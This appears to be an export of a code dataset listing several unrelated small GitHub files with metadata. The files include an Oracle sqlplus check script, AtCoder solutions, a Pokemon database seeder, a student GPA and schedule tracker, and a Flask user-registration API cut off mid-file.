blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
528fdb89634d853ef8ee5161ca4b647ab15dc579 | cd941f5f6e9dcf33ead0581b9c3c2fc62ff532ec | /check_database/check_database.py | 8850f14600fd367f4c1d190e588d29faf44c8c7c | [] | no_license | uzixxx/pythoncode | a7cea32ef6e8c73232295affd4bbdfdebcac0644 | 36a171ba5ef3ee9f9a9303b466cb12082ae71e23 | refs/heads/master | 2023-03-25T08:18:55.434727 | 2020-12-22T13:04:53 | 2020-12-22T13:04:53 | 320,172,493 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 765 | py | import subprocess
oracle_home = 'D:/app/Administrator/product/11.2.0/dbhome_1'
user_name = 'xxxx'
user_passwd = 'xxxx'
user_tns = '127.0.0.1:1521/orcl'
user_sqlplus = oracle_home + '/bin' + '/' + 'sqlplus'
default_shell = user_sqlplus + ' / as sysdba'
user_shell = user_sqlplus + ' ' + user_name + '/' + user_passwd + '@' + user_tns
def check_database(shell_input):
try:
p = subprocess.Popen(shell_input, stdin=subprocess.PIPE, shell=True)
p.stdin.write('@check_database.sql'.encode('utf-8'))
subprocess.Popen.communicate(p)
print('1')
return True
except Exception as e:
print('2')
print(str(e))
return False
if check_database(default_shell):
print("succeed")
else:
print("error")
| [
"595865975@qq.com"
] | 595865975@qq.com |
98b24527a49dde6f431800e65ba9394fb4c3a89e | 503d2f8f5f5f547acb82f7299d86886691966ca5 | /atcoder/abc288_e.py | 70c4f614907f574c7e19042d8ed2d2ab4cc3fcdb | [] | no_license | Hironobu-Kawaguchi/atcoder | 3fcb649cb920dd837a1ced6713bbb939ecc090a9 | df4b55cc7d557bf61607ffde8bda8655cf129017 | refs/heads/master | 2023-08-21T14:13:13.856604 | 2023-08-12T14:53:03 | 2023-08-12T14:53:03 | 197,216,790 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,214 | py | # https://atcoder.jp/contests/abc288/tasks/abc288_d
# from numba import njit
# from functools import lru_cache
import sys
input = sys.stdin.buffer.readline
INF = 1001001001001001
N, M = map(int, input().split())
A = list(map(int, (input().split())))
C = list(map(int, (input().split())))
X = list(map(int, (input().split())))
dp = [[INF]*(N+1) for _ in range(N+1)]
dp[0][0] = 0
# for i in range(N+1):
# dp[i][0] = 0
cost = [[0]*N for _ in range(N)]
for i in range(N):
for j in range(i+1):
if j==0:
cost[i][j] = C[i]
else:
cost[i][j] = min(cost[i][j-1], C[i-j])
# for i in range(N):
# print(cost[i])
idx = 0
for i in range(N):
for j in range(i+1):
dp[i+1][j+1] = min(dp[i+1][j+1], dp[i][j] + A[i] + cost[i][j])
if idx<M and i==X[idx]-1: continue
dp[i+1][j] = min(dp[i+1][j], dp[i][j])
if idx<M and i==X[idx]-1:
idx += 1
# for i in range(N+1):
# print(dp[i])
ans = INF
for j in range(M, N+1):
ans = min(ans, dp[N][j])
# for i in range(M):
# ans += A[X[i]-1]
print(ans)
# WA
# import sys
# input = sys.stdin.buffer.readline
# # def input(): return sys.stdin.readline().rstrip()
# # sys.setrecursionlimit(10 ** 7)
# import copy
# N, M = map(int, input().split())
# A = list(map(int, (input().split())))
# C = list(map(int, (input().split())))
# X = list(map(int, (input().split())))
# ans = 0
# for i in range(M):
# ans += A[X[i]-1]
# pre = [[]]
# idx = 0
# for i in range(N):
# jj = 0
# if i==X[idx]-1:
# v = C[X[idx]-1]
# u = X[idx] - 1
# for j in range(idx):
# if C[X[idx]-1-j]<v:
# v = C[X[idx]-1-j]
# u = X[idx] - 1
# for j in range(len(pre[u])):
# # print(u, j, pre[u])
# if j<jj:
# if C[u-j-1]: break
# v = C[u-j-1]
# else:
# if v<pre[u][j]+C[u-j-1]: break
# v = pre[u][j]+C[u-j-1]
# jj = max(jj, j+1)
# ans += v
# print(ans, idx, v, u)
# idx += 1
# pre.append(copy.copy(pre[-1]))
# pre[-1].append(A[i] + C[i])
# pre[-1].sort()
# # print(pre)
# print(ans)
| [
"hironobukawaguchi3@gmail.com"
] | hironobukawaguchi3@gmail.com |
2ee2dcf3dcd8da231a4ddae3d99e7792e2185f23 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/0/3o.py | 6d08125d0b91f6c1763e4b9719945ab4e63276fb | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 485 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == '3O':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"juliettaylorswift@gmail.com"
] | juliettaylorswift@gmail.com |
c82e9d1d48077221ebd7c1d33228d3e2e26cffdb | fbfd051d3448d350efb94ea5571d5b1a3989ead6 | /hackathon/exoticPet/app/db/dbscript.py | cfc14cc52b2c2111b78b2b272b0c3d350ac86727 | [] | no_license | cliffmin/rapid_prototyping | 08cb64e8d9ac90a748aa6f082cb2f38fdad0677d | bd0485745cff352b73ad0b74d8c4bc8cd89ff038 | refs/heads/master | 2016-08-05T06:41:03.823213 | 2014-03-08T23:40:31 | 2014-03-08T23:40:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,140 | py | import datetime
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from table_def import Pokemon
engine = create_engine('sqlite:///pokemon.db', echo=True)
# create a Session
Session = sessionmaker(bind=engine)
session = Session()
# Create an artist
pikachu = Pokemon("Pikachu", "male", "electric", "9")
charmander = Pokemon("Charmander", "male", "fire", "17")
chancey = Pokemon("Chancey", "female", "egg", "18")
steelix = Pokemon("Steelix", "male", "metal", "20")
squirtle = Pokemon("Squirtle", "female", "water", "10")
bulbasaur = Pokemon("Bulbasaur", "male", "grass", "20")
butterfree = Pokemon("Butterfree", "female", "insect", "30")
jigglypuff = Pokemon("jigglypuff", "female", "moon", "25")
oddish = Pokemon("Oddish", "male", "grass", "40")
dewgong = Pokemon("Dewgong", "female", "moon", "17")
# add more albums
# Add the record to the session object
session.add(pikachu)
session.add(charmander)
session.add(steelix)
session.add(chancey)
session.add(squirtle)
session.add(bulbasaur)
session.add(butterfree)
session.add(jigglypuff)
session.add(dewgong)
# commit the record the database
session.commit()
| [
"cliffmin@gmail.com"
] | cliffmin@gmail.com |
90b417bedd17743c79571e8607da6f6a022d1f12 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03024/s808391195.py | bd7e39cfcdbb36cf608ec3f0dbb696430bf5c305 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 163 | py | s = list(input())
counter = 0
k = len(s)
for i in range(k):
if s[i] == "o":
counter += 1
if counter+(15-k) >= 8:
print("YES")
else:
print("NO") | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
3b4c743f75615f62c7429fe6b6ce779f1b9f4d18 | 627e78797b40c2140fdb62020bef37c9640d51d1 | /packets/PluginMessage.py | 84ecd77294375a049435f51d2c6b9f49e4a89674 | [] | no_license | magnusjjj/tuxcraft | fefcca0f81541c5976c05324a4dc3dad7dd7c494 | 3586b366b16f3795d9ba238dfbb6de38efcdb6bc | refs/heads/master | 2020-05-26T01:55:43.364377 | 2012-09-27T08:56:30 | 2012-09-27T08:56:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 329 | py | # -*- coding: utf-8 -*-
import time
import struct
import tuxcraft_tools
def command(thread):
print 'Pluginmessage'
channel = tuxcraft_tools.minecraft_read_string(thread.channel) # Message string
length = tuxcraft_tools.minecraft_read_short(thread.channel) # Message string
data = thread.channel.recv(length) # Message string
| [
"tuxie@tuxie-mint.(none)"
] | tuxie@tuxie-mint.(none) |
94bca947c8473901ff7ae6d069379f1cceededab | 51d8a1ce1cadde093a9e1a1810f75714068de941 | /alphatracker.py | 1fab71cceb3c062d5848556f70e9703285d627ad | [] | no_license | Acescout92/IT106-AlphaTracker | 3ec58bec8cae8d2a2b8adda26537edf468add9dd | caea082f859efe8c97fb8417d851b786b38bc00e | refs/heads/master | 2020-03-23T06:08:51.849145 | 2018-07-16T20:34:03 | 2018-07-16T20:34:03 | 141,191,681 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,655 | py | #-------------------------------------------------------------------------------
# Alpha Tracker
# Student Names:Bryce H and Ashok S.
# Assignment: project_2.py
# Submission Date: 5/6/2018
# Python Version: 3.6
#-------------------------------------------------------------------------------
# Honor Code Statement: I received no assistance on this assignment that
# violates the ethical guidelines as set forth by the
# instructor and the class syllabus.
#-------------------------------------------------------------------------------
# References: stackoverflow for os.path.isfile method syntax and usage.
#-------------------------------------------------------------------------------
# Note: (a note to the grader as to any problems or uncompleted aspects of
# of the assignment)
#-------------------------------------------------------------------------------
# Pseudocode:
# Starts here
#Please refer to report.docx; pseudo code was too long for this area.
#-------------------------------------------------------------------------------
# Source Code: Your main module should be written here
#-------------------------------------------------------------------------------
import json
import os
from random import randint
import time
def start_here():
"""Checks the existence of user files, if none exist initializes the new user creation tools"""
while True:
if os.path.isfile('current_courses.json') and os.path.isfile('full_courses.json'):
user = retrieve_user()
if check_login(user):
main_menu(user)
else:
print("Failed to log in. Exiting Program.")
exit()
#First time run initialization
else:
user = create_login()
#path = 'C:\\Users\\bryce\\documents\\IT106' #Hardcoded placeholder. Must change to dump files to .py files directory.
#path +="\\userfile.json"
with open('userfile.json', 'w') as user_file:
json.dump(user, user_file)
first_run(user)
continue
def main_menu(user): #WORK TO BE CONTINUED FROM HERE
"""Presents the main menu choice tree"""
gpa = gpa_calculator()
clear_screen()
while True:
for val in user.values():
print("\nWelcome "+str(val[0])+", G-Number: " + str(val[2])+" GPA: "+str(gpa)+ "!")
try:
main = int(input("Please select from the following:\n1.Class Schedule\n2.Edit Class Schedule\n3.GPA Simulator\n4.Grad Date Simulator\n5.Exit\n"))
if main == 1:
print_schedule()
elif main == 2:
edit_schedule()
elif main == 3:
gpa_menu(gpa)
elif main == 4:
grad_simulator(user)
elif main == 5:
exit()
else:
print("Invalid selection. Please try again\n")
continue
except ValueError:
print("Invalid selection. Please try again")
continue
def create_login():
"""Generates a dictionary for a new user's profile, assigns user a G-Number"""
user = {}
username = input("We see that you are a new user! Please create a username!\n")
password = input("Please input your password \n")
clear_screen()
print("Username accepted. Now generating g-number:\n")
g_num = randint(00000000,99999999)
print("Your new G-Number is: G", g_num)
user[username] = [username, password, g_num, 0.0]
return user #Return type: dictionary
def first_run(user):
"""Creates dictionaries: full_list and current_load containing class information"""
print("Hello, and welcome to My Tracker v.01 alpha")
print("Thank you. Beginning initial set up. Please be patient")
full_list = collect_courses() #full_list contains the entirety of the classes for the major
with open('full_courses.json', 'w') as full_courses_file:
json.dump(full_list, full_courses_file)
print("Thank you. Now, we will build your current class load.")
with open('current_courses.json', 'w') as current_classes:
json.dump(current_load(full_list), current_classes) #using full list, create current class schedule
def collect_courses():
"""Collects all classes required for the major, their credits, and grade status"""
clear_screen()
full_courses = {}
input("First, We need to build a list of every class required for your major, and their respective credit values.")
while True:
clear_screen()
print(full_courses)
class_code = input("Please input course code. i.e: IT106\n If you are finished, press q to quit\n")
if class_code == 'q':
break
elif class_code.upper() in full_courses.keys():
print("You have already input this class. Please try again")
continue
class_code = class_code.upper()
try:
credit_hours = int(input("input the credit value for course: "+class_code+"\n"))
grade = input("If you have already finished " + class_code+", please give your final letter grade. Otherwise type 0\n")
status = input("Please give the status of this class: A-Actively Taking D-Dropped W-Withdrawn C-Completed\n")
if status.upper() == 'A' or status.upper() == 'D' or status.upper() == 'W' or status.upper() == 'C': # changed this, OR can't be used after a single == like it was before
full_courses[class_code] = [credit_hours, grade, status]
else:
input("Invalid selection")
continue
except ValueError:
input("Invalid entry. ")
continue
return full_courses
def current_load(full_list):
"""Creates a dictionary with your current class schedule"""
days_list = ['mon', 'tues', 'wed', 'thurs', 'fri','sat','sun']
valid_grades= ["A", "A-","B+","B","B-","C+","C","C-","D","F",'0']
clear_screen()
current_schedule = {}
print("Here are all of the classes you have input thus far: ", full_list.keys())
input("Now, we will begin to build you current course schedule. Press any key to continue")
class_code = input("Input class code, or type 'q' to quit: ")
while class_code!= 'q':
print(current_schedule)
try:
if class_code == 'q':
break
elif class_code.upper() not in full_list.keys():
print("This class does not exist in your full list. Please try again:")
class_code = input("Input class code, or type 'q' to quit: ")
continue
elif class_code.upper() in current_schedule:
print("You have already entered the information for this class. Please try again ")
continue
else:
class_code = class_code.upper()
day = input("What days does "+class_code+" take place on? Separate by comma and use format:\nmon\ntues\nwed\nthurs\nfri\nsat\nsun ").split(',')
for val in day:
if val not in days_list:
print("Invalid option")
continue
start_time = int(input("Using format 2400, what time does "+class_code+" begin?\n"))
end_time = int(input("Using format 2400, what time does "+class_code+" end?\n"))
grade = input("What letter grade do you currently have? If no grade, input 0 ")
if grade not in valid_grades:
print("Invalid input")
continue
current_schedule[class_code] = [day, start_time, end_time, grade]
class_code = input("Input class code, or type 'q' to quit: ")
except ValueError:
input("Invalid input. Press any key to continue ")
continue
return current_schedule
def retrieve_user():
"""Obtains user_file dictionary"""
while True:
try:
with open('userfile.json', 'r') as opened_file:
user = json.load(opened_file)
return user
except IOError:
print("User File not found!")
create_login()
continue
def check_login(user):
"""Confirms user credentials"""
clear_screen()
while True:
check_username = input("Please input your username\n")
if check_username in user.keys():
check_password = input("Please input your password\n")
if check_password == user[check_username][1]:
return True
else:
error = input("Password mismatch. Try again? type n to quit, or any key to continue \n")
if error != 'n':
continue
else:
return False
else:
error = input("No username match! type n to quit or any key to continue \n")
if error != 'n':
continue
else:
return False
def print_schedule():
"""Prints a simple schedule, using a list holding the days of the week"""
clear_screen()
print("====Current Schedule====")
days = ['sun', 'mon', 'tues', 'wed', 'thurs', 'fri', 'sat']
with open('current_courses.json', 'r') as current_file:
schedule = json.load(current_file)
for day in days:
for val, val2 in schedule.items():
if day in val2[0]:
print(day, val, str(val2[1])+'-'+str(val2[2])+" Presumed Grade: "+ val2[3])
return 0
def grad_simulator(user):
"""Uses the full_courses file to determine how many credits left you have until graduation"""
while True:
total_credits = 0
c_classes = 0
completed_credits = []
with open('full_courses.json', 'r') as full_courses:
schedule = json.load(full_courses)
for val in schedule.values():
total_credits+=val[0]
if val[2] == 'C':
c_classes+=1
completed_credits.append(val[0])
print("Your major requires a total of: "+str(total_credits)+" credits to graduate. You have completed: " +str(c_classes)+" classes, or "+ str(sum(completed_credits)) + " credits")
try:
menu = int(input("\n1.Simulate by Semester\n2.Quit\n"))
while menu != 2:
if menu == 1:
sem_sim(total_credits,c_classes,completed_credits)
menu = int(input("\n1.Simulate by Semester\n2.Quit\n"))
break
except ValueError:
input("Incorrect input. Press any key to try again")
continue
return 0
def sem_sim(total_credits, c_classes, completed_credits): #REQUIRES MORE WORK
"""Uses input semester simulations to predict how many years and credits remaining until graduation"""
clear_screen()
while True:
clear_screen()
by_semester = []
credits_remaining = total_credits - sum(completed_credits)
print("Let's start by getting some information about your semester load. ")
print("In a year, a student may take 4 semesters: Spring, Summer, Fall, Winter. ")
try:
semesters_count = int(input("How many semesters will you be taking this year? "))
for val in range(semesters_count):
credits = int(input("How many credits are you taking in semester: " +str(val+1)+"?"))
by_semester.append(credits)
print("Ok! Here's what your projected credit spread looks like for the year: \n", by_semester)
projected_credit_impact = credits_remaining - sum(by_semester)
classes_left = projected_credit_impact / 3
print("If you follow your current plan, you will have: "+str(projected_credit_impact)+" credits remaining, which roughly translates to "+str(round(classes_left,2))+" classes remaining ")
input("Press any key to continue")
break
except ValueError:
input("Invalid input. Press any key to continue")
continue
return 0
def gpa_calculator():
"""Gets the most recent grades from full_courses and returns cumulative GPA. To be printed on Main Menu"""
gpa = 0.0
grade_array = []
credit_array = []
grade_converter = {"A": 4.00, "A-":3.67, "B+": 3.33, "B": 3.00, "B-": 2.67, "C+": 2.33, "C": 2.00, "C-": 1.67, "D": 1.00, "F": 0.0}
with open('full_courses.json', 'r') as fp:
full_courses = json.load(fp)
for val in full_courses.values():
if val[2] == 'C':
credit_array.append(val[0])
for i, val2 in grade_converter.items():
if val[1] == i:
grade_array.append(val2)
final_array = [val*val1 for val,val1 in zip(grade_array, credit_array)]
gpa = round(sum(final_array)/sum(credit_array),2)
print("GPA CALCULATED AS: "+str(gpa))
return gpa
def gpa_menu(gpa):
"""Uses the current schedule to simulate potential GPA changes. Simulates both semester and cumulative GPA"""
clear_screen()
valid_grades= ["A", "A-","B+","B","B-","C+","C","C-","D","F",]
print("===GPA Simulator===")
while True:
menu = int(input("Please select from the following options:\n1.Simulate Semester GPA & Cumulative GPA\n2.Exit and Return to Main Menu"))
if menu == 1:
grade_array = []
with open('current_courses.json', 'r') as fp:
current_courses = json.load(fp)
with open('full_courses.json', 'r') as full_file:
full_courses = json.load(full_file)
full_credits = [y[0] for x,y in full_courses.items() if y[2]=='C'] #Holds the total credit values of all completed classes
predicted_credits = [y[0] for x,y in full_courses.items() if x in current_courses.keys()] #Holds the credit values of the predicted classes from the current_courses list
print("These are you current classes:\n")
for val, val2 in current_courses.items():
print(val)
for val in current_courses.keys():
grade = input("Input predicted letter grade for class: "+str(val)+" ")
if grade not in valid_grades:
print("Invalid input")
break
else:
credit_value = grade_conversion(grade)
grade_array.append(credit_value)
total = [val2*val3 for val2,val3 in zip(predicted_credits, grade_array)] #Takes the credits and grade values for the predicted classes and multiplies them together. Creates and array of true GPA-affective values
sem_gpa = round(sum(total)/sum(predicted_credits),2) #Builds predicted GPA
predicted_gpa_val = sum(predicted_credits)*sem_gpa #Multiplies total predictive credits with the predicted semester GPA
current_gpa_val = sum(full_credits)*gpa #Multiplies total earned credits with current GPA
cum_gpa = round((current_gpa_val + predicted_gpa_val)/(sum(full_credits)+sum(predicted_credits)),2) #PUTS ALL OF IT TOGETHER WOOOOO
print("Predicted GPA for the end of the semester is: " + str(sem_gpa)+". Your cumulative GPA would be: "+str(cum_gpa)) #all of that for this one line why god.
elif menu == 2:
print("exiting...")
break
return 0
def grade_conversion(grade):
"""Accepts str value grade and converts the letter grade to a credit value"""
grade_converter = {"A": 4.00, "A-":3.67, "B+": 3.33, "B": 3.00, "B-": 2.67, "C+": 2.33, "C": 2.00, "C-": 1.67, "D": 1.00, "F": 0.0}
while True:
for val, val2 in grade_converter.items():
if grade == val:
return val2
def edit_schedule():
"""Presents the edit_schedule menu, and handles editing the current_courses file."""
days_list = ['mon', 'tues', 'wed','thurs', 'fri', 'sat', 'sun']
valid_grades= ["A", "A-","B+","B","B-","C+","C","C-","D","F","0"]
clear_screen()
with open('full_courses.json', 'r') as f_file:
full_courses = json.load(f_file)
with open('current_courses.json', 'r') as s_file:
current_courses = json.load(s_file)
while True:
try:
print("====Course Editing Menu====")
menu = int(input("1.Edit Class Schedule\n2.Close out current_classes\n3.Add Class to current schedule\n4.Remove courses\n5.Exit"))
if menu == 1:
edit_current_schedule(current_courses, full_courses)
elif menu ==2:
choice = input("Are you sure you want to close out your schedule? This will wipe out your current_courses file (Y/N) ")
if choice.upper() == "Y":
for val,val2 in current_courses.items():
grade = input("Enter final letter grade for class: "+val)
full_courses[val][1] = grade
full_courses[val][2] = "C"
with open('full_courses.json', 'w') as fp:
json.dump(full_courses, fp)
fp = open('current_courses.json', 'w')
fp.close()
print("Current_courses file wiped")
continue
elif choice.upper() == 'N':
continue
elif menu == 3:
class_code = input("Input class code, i.e IT106 ")
if class_code not in full_courses.keys():
print("Class does not exist ")
continue
else:
days = input("Using format mon, tues, wed, thurs, fri, sat, sun, input class days. Separate by comma").split(',')
for val in days:
if val not in days_list:
clear_screen()
print("WARNING: Invalid option")
days = "0"
continue
start_time = int(input("Using format 2400, input start time: "))
end_time = int(input("Using format 2400, input end time: "))
grade = input("Input letter grade for this class. If no grade, input 0: ")
if grade not in valid_grades:
grade = "0"
print("Invalid option")
continue
else:
current_courses[class_code.upper()] = [days,start_time,end_time,grade.upper()]
with open('current_courses.json', 'w') as fp:
json.dump(current_courses, fp)
continue
elif menu == 4:
print("Here are the courses of your semester: ")
for val in current_courses:
print(val)
course_code = input("Which class do you want to delete? ")
if course_code not in current_courses.keys():
print("Invalid Entry")
continue
else:
choice = input("Are you sure you want to delete: " +course_code+"?(Y/N) ")
if choice.upper() == "Y":
del current_courses[course_code]
with open('current_courses.json', 'w')as fp:
json.dump(current_courses, fp)
continue
else:
continue
elif menu == 5:
break
except ValueError:
print("Invalid input, try again")
continue
return 0
def edit_current_schedule(current_courses, full_courses):
"""Presents the menu to edit the specifics of your current schedule"""
days_list = ['mon', 'tues', 'wed','thurs', 'fri', 'sat', 'sun']
valid_grades= ["A", "A-","B+","B","B-","C+","C","C-","D","F"]
clear_screen()
while True:
try:
print("Here are your current classes")
for val in current_courses:
print(val)
choice = int(input("Please select which one you'd like to edit:\n1.Days\n2.Time\n3.Grade\n4.Save and Quit "))
if choice !=4:
class_code = input("Which class? ")
if choice == 1:
days = input("Please input days using style: mon,tues,wed,thurs,fri,sat,sun. Separate by comma ").split(',')
for val in days:
if val not in days_list:
print("Invalid option")
days = current_courses[class_code][0]
current_courses[class_code][0] = days
else:
current_courses[class_code][0] = days
elif choice == 2:
start_time = int(input("Using format 2400, input start time: "))
end_time = int(input("Using format 2400, input end time: "))
current_courses[class_code][1] = start_time
current_courses[class_code][2] = end_time
continue
elif choice == 3:
grade = input("Update current letter grade: ")
if grade not in valid_grades:
print("Invalid input")
grade = current_courses[class_code][3]
current_courses[class_code][3] = grade.upper()
full_courses[class_code][1] = grade.upper()
else:
current_courses[class_code][3] = grade.upper()
full_courses[class_code][1] = grade.upper()
continue
else:
with open('current_courses.json', 'w') as fp:
json.dump(current_courses, fp)
with open('full_courses.json', 'w') as f_file:
json.dump(full_courses, f_file)
break
except ValueError:
print("Invalid input.")
continue
return 0
def clear_screen():
"""Useful clear screen function"""
if os.name == 'nt':
os.system("cls")
else:
os.system("clear")
start_here()
| [
"bryce.hollandsworth@gmail.com"
] | bryce.hollandsworth@gmail.com |
11e4cf3d438647c71cea8aba3c12937c79216d11 | 7d81464b641105a1dcf2b7ff21b1c03931734367 | /Statistic/env/bin/distro | e23a8d54cab13f6f871cb2a27fefa57357223d22 | [] | no_license | Syxoyi/potential-enigma | 140dbd11bf7adc00a72ef315fcf39ec45d820b62 | 020aead1b48bd8dd944786151812158fab6c71af | refs/heads/master | 2021-02-10T12:15:57.307328 | 2020-09-11T15:10:03 | 2020-09-11T15:10:03 | 244,380,999 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | #!/home/max/scrCATALOG/Python/potential-enigma/Statistic/env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from distro import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"m.travushkin@r77.center-inform.ru"
] | m.travushkin@r77.center-inform.ru | |
f4d26a6a61e49126688770ec6fef27cf124a97c2 | d73aee2dbbef252318ffcc168da6dc007f46a381 | /GermanQuinonez/employee/person.py | 1b60e9a408c90b6a677c40e3ca245466ce6a5a5d | [] | no_license | oscarDelgadillo/AT05_API_Test_Python_Behave | e8c1641afc47888c7a2b6620e4948e3d5412a817 | 7755c0c296aeee61538ce11649a718dfb0f17a9c | refs/heads/master | 2021-05-12T07:41:33.278396 | 2018-01-22T23:42:47 | 2018-01-22T23:42:47 | 117,254,934 | 0 | 0 | null | 2018-01-12T15:08:34 | 2018-01-12T15:08:34 | null | UTF-8 | Python | false | false | 227 | py | class Person:
def __init__(self, name, last):
self.name = name
self.last_name = last
# self.age = age
# self.ci = ci
def get_name(self):
return self.name + " " + self.last_name
| [
"German.Quinonez@fundacion-jala.org"
] | German.Quinonez@fundacion-jala.org |
ee826811812b750833f028442f9616d4112a68c3 | c52486d99f3b3d24bbe8c4130297f037cea02e0f | /website/admin.py | d765828a8b4160ee604151aa876b040a1afc1615 | [] | no_license | boolow5/ESDI | 99a954143241a3d55f67e82f4c679dfe9ad5bbfe | 58a6b6347391b92cdb4c555a6be2451ea470cad3 | refs/heads/master | 2021-01-19T14:27:50.590711 | 2017-05-08T22:25:15 | 2017-05-08T22:25:15 | 88,163,432 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 269 | py | from django.contrib import admin
from website.models import *
# Register your models here.
admin.site.register(Page)
admin.site.register(Image)
admin.site.register(Person)
admin.site.register(Organization)
admin.site.register(Country)
admin.site.register(PageSection)
| [
"boolow5@gmail.com"
] | boolow5@gmail.com |
579eb0fb7ac8eff088fd85e5a549022f8acc47eb | 91a90d3ea05a2a64f4c2cec12832932a683269ca | /ex1.py | 668f7a82c2b1f2d76ee88f1522ab9a768795d594 | [] | no_license | CataHax/lab3-py | c1e8048bcf51210bef380b64d2975ee4c52cf0fb | 78c1e275f5196e7ef58770ead08e1fdecc8fcf64 | refs/heads/main | 2023-05-05T10:23:18.863114 | 2021-06-04T16:33:24 | 2021-06-04T16:33:24 | 373,899,828 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 277 | py | x1 = int(input("Enter the first number:"))
x2 = int(input("Enter the second number:"))
x3 = int(input("Enter the third number:"))
# now I must do three "if-s"
if x3 > x2 > x1:
print("increasing")
elif x1 > x2 > x3:
print("decreasing")
else:
print("nothing")
| [
"noreply@github.com"
] | noreply@github.com |
bfc3e9d0d6532309de3193b86d7f7002dd5b8709 | 265de8ea95605438664ace712a1a3f7f406b287a | /databass-flask/databass_api.py | 577138bebf54e7e30f5145dac9d5aa6933c8ae38 | [] | no_license | flyingdust777/CS411-DataBASS-public | f42090c874ca99c3c29743cf829a12765b4b842f | 6f0c95ddb7616cb4012c80eaf7d4280ea7f8201c | refs/heads/master | 2021-08-29T15:47:12.486064 | 2017-12-14T06:38:45 | 2017-12-14T06:38:45 | 113,407,278 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 45,008 | py | # To-Do List:
# 1. Map country and region codes to their actual names
# 2. TEST THE FUNTIONALITY EXTENSIVELY!
# -------------------------------------------------------------------------------------------------------------------- #
# Import flask libraries
from flask import Flask, request, jsonify
from flask_api import status
from flask_bcrypt import Bcrypt
import requests
import db_config as dbc
# Connects Flask server to MySQL database
import mysql.connector as MySQL
# Generates access tokens
import binascii
import os
# Import libraries for checking the validity of usernames and email addresses
from string import ascii_letters
from string import digits
from string import punctuation
import re
# Used for error checking
import traceback
# -------------------------------------------------------------------------------------------------------------------- #
# Initialize flask app
app = Flask(__name__)
bcrypt = Bcrypt(app)
# Connect to the project database on the VM
db = MySQL.connect(host=dbc.db_host,
port=dbc.db_port,
user=dbc.db_user,
password=dbc.db_password,
database=dbc.db_name,
buffered = True)
# -------------------------------------------------------------------------------------------------------------------- #
# User Registration
@app.route("/api/user/register", methods=["POST"])
def register():
# Read in registration input parameters
username = request.form.get('username') # String (a-z, A-Z, 0-9, -, _)
password = request.form.get('password') # String (6 <= characters <= 256)
email_address = request.form.get('email_address') # String (valid email)
display_name = request.form.get('display_name') # String (1 <= characters <= 265)
# Check if all the registration input parameters are valid
check = check_for_none("register", [("username", username),
("password", password),
("email", email_address),
("display_name", display_name)])
if check is not None:
return jsonify(check), status.HTTP_200_OK
check2 = validate_parameters("register",
username=username,
password=password,
email_address=email_address,
display_name=display_name)
if check2 is not None:
return jsonify(check2), status.HTTP_200_OK
try:
cursor = db.cursor()
except:
error_code = "connection_to_database_failed"
content = {"success": False, "error_code": error_code}
print(traceback.format_exc())
return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
# Check if the username is new
cursor.execute("SELECT username FROM user WHERE username=%s;", (username,))
result = cursor.fetchone()
if result:
error_code = "user_register_username_in_use"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
# If this line of the register() function is reached,
# all the registration input parameters are valid.
# Insert registration information into user table
password_hash = bcrypt.generate_password_hash(password)
#generate a random email_token for the user, for char(128)
email_token = binascii.hexlify(os.urandom(64)).decode()
cursor.execute("INSERT INTO user values(%s, %s, %s, %s, NOW(), NULL, 0, 0, %s);",
(username, email_address, display_name, password_hash, email_token))
db.commit()
cursor.close()
send_email_verif(email_address, email_token)
content = {"success": True}
